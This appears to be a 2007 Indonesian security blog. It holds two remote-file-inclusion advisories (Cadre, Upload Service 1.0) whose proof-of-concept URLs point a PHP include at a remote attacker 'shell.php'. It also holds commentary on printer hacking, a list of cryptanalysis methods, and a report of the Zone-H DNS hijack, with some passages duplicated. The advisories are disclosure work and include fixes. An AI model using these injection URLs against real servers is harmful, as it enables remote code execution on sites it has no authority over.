Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : January, 31st 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv63-y3dips-2007.txt
Critical Lvl : Critical
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Cadre
URL : http://www.cronosys.com | http://savannah.gnu.org/projects/cadre/
Download-path : http://ftp.azc.uam.mx/mirrors/gnu/savannah/files/cadre/cadre-20020724.tar.gz
Description : Cadre is a PHP framework for developing large business applications.
It currently supports PostgreSQL as the database back end (although
this is extensible).
Vulnerability:
~~~~~~~~~~~~~~
-----class.Quick_Config_Browser.php ----
include_once($GLOBALS[config][framework_path] . "class.Browser.php");
-------
An attacker can exploit this vulnerability with a simple php injection script.
Poc/Exploit:
~~~~~~~~~~~~
http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?
Greetz:
~~~~~~~
ana, K-159, the_day, str0ke, waraxe, negative
Wednesday, January 31, 2007
Sunday, January 28, 2007
Printer are a target ?
Yeah .. sebagaimana di tulis oleh Larry Seltzer yang diberi judul "Our Printer Got Hacked?!?!" dalam kolom security di situs eweek.com bertanggal 25 januari 2007, lebih lanjut dia beropini bahwa hacker dapat "memasuki" port yang terbuka dan melakukan bof exploit terhadap printer.
Setelah sedikit membaca tulisan tersebut gw jadi teringat dengan salah satu buku yang pernah gw baca dan gw ingat di salah satu chapternya menceritakan detil proses hacking terhadap printer, dan "keren"nya lagi buku ini di terbitkan pada tahun 2003 (underground technique huh??, yipie), berikut sedikit "potongan" dari chapter tersebut
Sebenarnya gw sendiri juga belum pernah melakukan "POC" sedikitpun terkait dengan hal ini, tetapi sebagaimana arsitektur dari sebuah printer yang di lengkapi dengan memory serta menjalankan service (binding port on pc) maka adalah mungkin untuk menjadikannya file servers, mengeskploitasinya, bahkan hanya melakukan "anonymous printing". ow yah sedikit pertanyaan dari gw, apakah setelah terjadi kegagalan dalam proses printing dan kamu me-restart komputer dan printer maka setelah semua menyala sempurna maka printer akan langsung mencetak "pending/failed process"?
Setelah sedikit membaca tulisan tersebut gw jadi teringat dengan salah satu buku yang pernah gw baca dan gw ingat di salah satu chapternya menceritakan detil proses hacking terhadap printer, dan "keren"nya lagi buku ini di terbitkan pada tahun 2003 (underground technique huh??, yipie), berikut sedikit "potongan" dari chapter tersebut
h3X is a hacker, or to be more precise, she is a hackse (from hexe, the German word for witch). Currently,h3X is on the lookout for some printers. Printers are the best places to hide files and share them with other folks anonymously. And since not too many people know about that, h3X likes to store exploit codes and other kinky stuff on printers, and point her buddies to the Web servers that actually run on these printers.
Chapter 4, h3X’s Adventures in Networkland by FX; Stealing the network: How To Own a box
Sebenarnya gw sendiri juga belum pernah melakukan "POC" sedikitpun terkait dengan hal ini, tetapi sebagaimana arsitektur dari sebuah printer yang di lengkapi dengan memory serta menjalankan service (binding port on pc) maka adalah mungkin untuk menjadikannya file servers, mengeskploitasinya, bahkan hanya melakukan "anonymous printing". ow yah sedikit pertanyaan dari gw, apakah setelah terjadi kegagalan dalam proses printing dan kamu me-restart komputer dan printer maka setelah semua menyala sempurna maka printer akan langsung mencetak "pending/failed process"?
The on-board memory consists of six areas: base code,language code, fonts, DRAM, EEROM (electrically erasable read-only memory), and expandable. The base code is split between two 500K-byte devices and uses one of the minor support ASICs to interface with the data bus. Its two functions are to help ease bus loading and to provide a small pipeline. The language code uses a single 2M-byte read-only-memory (ROM) which contains the PCL 5C language andDare to try it ?
several internal demonstration plots. The fonts are also contained in a single 2M-byte ROM. The main DRAM is used for swath and processor scratch memory. The PCL 5C ROM, the font ROM, and the DRAM have direct access to the address and data bus. The EEROM stores constants that must be retained when the unit is powered off. Finally, the expandable space can be used for up to 24M bytes of DRAM, or up to 18M bytes with the PostScript option
HP DeskJet 1200C Printer Architecture; www.hpl.hp.com/hpjournal/94feb/feb94a8.pdf
Saturday, January 27, 2007
Cryptanalysis
Cryptanalysis is the study of methods for obtaining the meaning of encrypted information, without access to the secret information which is normally required to do so. Typically, this involves finding the secret key. In non-technical language, this is the practice of codebreaking or cracking the code
Methods of cryptanalysis
Classical cryptanalysis:
Frequency analysis
Kasiski examination
Index of coincidence
Symmetric algorithms:
Differential cryptanalysis
Linear cryptanalysis
Integral cryptanalysis
Related-key attack
Statistical cryptanalysis
Mod-n cryptanalysis
XSL attack
Slide attack
Boomerang attack
Davies' attack
Yoyo game
Other methods:
Birthday attack
Man in the middle attack
Brute force attack
Gardening (cryptanalysis)
Differential power analysis
info tersebut diatas gw dapatkan dari http://en.wikipedia.org/wiki/Cryptanalysis;
terus terang hal ini membuat gw terkaget-kaget juga karena informasi seperti itu malah bisa di dapatkan dengan mudah di internet (kids, leave your school and just !google all your question :lol: , kidding) tetapi sayangnya masih saja banyak yang "gak ngeh" dan dianggap
Entah apa yang "merasuki" gw sehingga bagi gw "membobol" itu lebih menyenangkan daripada "mengamankan" dan hal inilah yang membuat gw "banting stir" (if i may said that, or u may said that), begitu pula dengan beberapa anggapan yang membuat gw "kurang sepaham" dulu (baca: kenangan buruk di masa lalu, ingat! obat yang salah malah akan meracuni ), karena bagi gw ga ada yang 100% secure, dan keamanan bukan hanya soal seberapa "panjang rangkaian kunci", "seberapa bagus algoritma" yang dibuat atau "beberapa lapis firewall" yang digunakan.-
Sebenernya tulisan ini cuma buat menjawab kalo ada yang bertanya ke gw soal ini (itu juga kalo ada (sebenernya sih dah pernah :P, walau jujur gw masih ga transparan disini .. hehehehhe), ow yah .. mau tau kenapa tiba tiba gw menulis ini soalnya gw tergelitik lagi setelah ada yang tanya di forum echo soal bagai mana caranya ngetes kekuatan criptography? (yang sbenernya melenceng dari pertanyaan tetapi dah membangkitkan sedikit "kenangan"
sekali lagi kayak pesan di footer gw "Oh well, whatever , Nevermind"
Tuesday, January 23, 2007
Zone-H got defaced
Defacement archive Zone-h has itself been defaced,
I got this info posted on echo official mailing list sent by Charlie Crespo (our old friends from singapore also a member of SIG^2, hi cecil), the defacement are still on hold till i wrote this post (january, 23rd 2007: 21.10 WIB), in december 2006 zone-h also got defaced.
As i know they are running "apache web server" on linux Operating System and using "Customize" Joomla Content management system.
Updated (Januari, 24th 2007)
Confirmation from R.Preatoni about zone-h.org defacement at zone-h official page
Have you recently seen a different Zone-H when trying to access our pages? Magic of DNS redirection.
It appears that Saudi Arabia crackers managed to get the passwords of our registrar (our registrant panel to be precise), accessed the domain management page and changed the DNS entries, pointing the zone-h domain to an IP address belonging to the crackers on which they mounted the page you saw in the last 48 hours.
48 hours!?! So long it took to take contact with the registrar (they work only through email communication), explain the problem to 8 different people then finally getting a reset of our credentials, taking the domain back in control.
On the funny side, the same problem happened to Google in its German version which yesterday evening was redirected to a different page (different owner actually). In this case (automatic German/English translation) the trick was a bogus domain transfer request that a German provider accepted without explicit authorization from Google Inc. (silence-consense).
What a day! We are so glad we deserve so much of attention.
PS: you will soon find the mirrors in our DB as even though Zone-H wasn't hacked, from the users' point of view it appeared defaced, as only a few users realized they weren't visiting the actual Zone-H server. From the historycal point of view exactly the same incident happened to the Al jazeera sat tv network website, where a hacker managed to trick the registrar to send him the domain control passwords after sending a bogus passport copy during the ID verification process, subsequently changing Al Jazeera's DNS pointing to a different server.
p.s: thats why ive seen a "funny" script at the "Defacement page" yesterdays is the icon linking to zone-h.it
link rel="shortcut icon" href="http://www.zone-h.it/images/favicon.ico"well .. well, as an attacker you just need to find the weakest link, isnt it?
Monday, January 22, 2007
[ECHO_ADV_62$2007] Upload Service 1.0 remote file inclusion
Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : January, 21st 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv62-y3dips-2007.txt
Critical Lvl : Critical
------------------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Upload Service
version : 1.0
URL : http://bild-bearbeiten.de/
Download-path : http://bild-bearbeiten.de/scripts/upload_service_1.0.zip
---------------------------------------------------------------------------
1. Install directory are not being remove after installation process
2. Variables "$maindir" in top.php are not properly sanitized.
---------------top.php--------------------------------
...
include($maindir."config.php");
include($maindir."functions/error.php");
...
------------------------------------------------------------------
When register_globals=on and allow_fopenurl=on an attacker can exploit
this vulnerability with a simple php injection script.
Poc/Exploit:
~~~~~~~~~~
http://127.0.0.1/upload/top.php?maindir=http://127.0.0.1/shell.php?
Solution:
~~~~~~~
- Remember to remove your install directory and change config.php permission
- Simply Sanitize variable $maindir on affected files. (eg. $maindir=" ";)
- Turn off register_globals
Notification:
~~~~~~~~~~
vendor not contact yet
Date Found : January, 21st 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv62-y3dips-2007.txt
Critical Lvl : Critical
------------------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Upload Service
version : 1.0
URL : http://bild-bearbeiten.de/
Download-path : http://bild-bearbeiten.de/scripts/upload_service_1.0.zip
---------------------------------------------------------------------------
1. Install directory are not being remove after installation process
2. Variables "$maindir" in top.php are not properly sanitized.
---------------top.php--------------------------------
...
include($maindir."config.php");
include($maindir."functions/error.php");
...
------------------------------------------------------------------
When register_globals=on and allow_fopenurl=on an attacker can exploit
this vulnerability with a simple php injection script.
Poc/Exploit:
~~~~~~~~~~
http://127.0.0.1/upload/top.php?maindir=http://127.0.0.1/shell.php?
Solution:
~~~~~~~
- Remember to remove your install directory and change config.php permission
- Simply Sanitize variable $maindir on affected files. (eg. $maindir=" ";)
- Turn off register_globals
Notification:
~~~~~~~~~~
vendor not contact yet
Subscribe to:
Posts (Atom)